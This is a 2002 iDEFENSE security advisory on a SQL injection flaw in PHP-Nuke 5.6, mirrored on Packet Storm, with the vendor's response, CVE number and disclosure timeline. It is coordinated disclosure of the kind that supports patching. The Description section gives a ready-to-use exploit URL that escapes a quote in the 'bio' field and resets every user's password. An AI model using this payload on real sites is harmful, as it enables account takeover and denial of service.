exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

idefense.php-nuke.txt

idefense.php-nuke.txt
Posted Nov 1, 2002
Authored by David Endler, Kill9 | Site idefense.com

iDEFENSE Security Advisory 10.31.2002c - PHP-Nuke v5.6 contains a SQL injection vulnerability which allows remote attackers to compromise other system accounts.

tags | remote, php, sql injection
SHA-256 | a3d04f97e2f31f8823e8e0cf99005677ccda51bd844d3419d9e572c3c01b74d9

idefense.php-nuke.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.31.02c:
http://www.idefense.com/advisory/10.31.02c.txt
PHP-Nuke SQL Injection Vulnerability
October 31, 2002

I. BACKGROUND

"PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total
control of his web site, registered users, and he will have in the
hand a powerful assembly of tools to maintain an active and 100%
interactive web site using databases." More information is available
at http://www.phpnuke.org.

II. DESCRIPTION

PHP-Nuke is susceptible to an SQL injection attack that allows an
attacker to modify a user's table to his or her liking. It is
possible for any registered user of the target system to launch this
attack by feeding certain unfiltered characters to the account
manager module. The attacker can target a specific user or all system
users at once. The key is the ability to insert a backslash into the
"bio" field, thereby escaping a quote and leaving the SQL query open
for injection. The following example will modify every PHP-Nuke users
password to "1.":

Exploitation requires that the attacker log on, enter the account
manager and determine his or her UID through the source of the page.
If the attacker's UID is 2, he or she can then launch the attack by
requesting the following URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=
no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

The injected query is constructed as follows:

UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'

The marked area is all treated as a value to store into bio. The
"where" clause is commented out, leaving an update statement that
updates the entire table (ie: all users) to having a password of
MD5(1).

III. ANALYSIS

Exploitation allows an attacker to compromise any other system
account, thereby gaining the privileges and identification of the
compromised account. The attacker can also corrupt the entire user's
table, effectively denying service to legitimate users.

IV. DETECTION

iDEFENSE Labs successfully tested and exploited this vulnerability in
PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in
nature, administrators should not test in a production environment.

V. VENDOR FIX

The author, Francisco Burzi, responded:

"PHP-Nuke version 6.0 is not vulnerable to the SQL injection
attack...

Latest version is 6.0 and 6.5 under development. Old versions doesn't
have support of any kind, all bugs and security fixes apply in the
new versions. So, the solution to this security hole is to update the
software from 5.6 to 6.0 version."

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-1242 to this issue.

VII. DISCLOSURE TIMELINE

09/17/2002 Issue disclosed to iDEFENSE
09/23/2002 Author notified through submission form
09/23/2002 iDEFENSE clients notified
10/01/2002 iDEFENSE second attempt at PHP-Nuke contact
10/20/2002 iDEFENSE third attempt at PHP-Nuke contact
10/31/2002 Response from Francisco Burzi
(nukelite@users.sourceforge.net)
10/31/2002 Coordinated Public Disclosure

VIII. CREDIT

kill9 (kill9@hackers.com) is credited with discovering this
vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@idefense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPcHlgUrdNYRLCswqEQLGcwCdH27Ssm5+bhXyONfPn7uE+hk/gckAoOKJ
IbcubmZUdFwWk9wRDlyT3kFj
=FWej
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close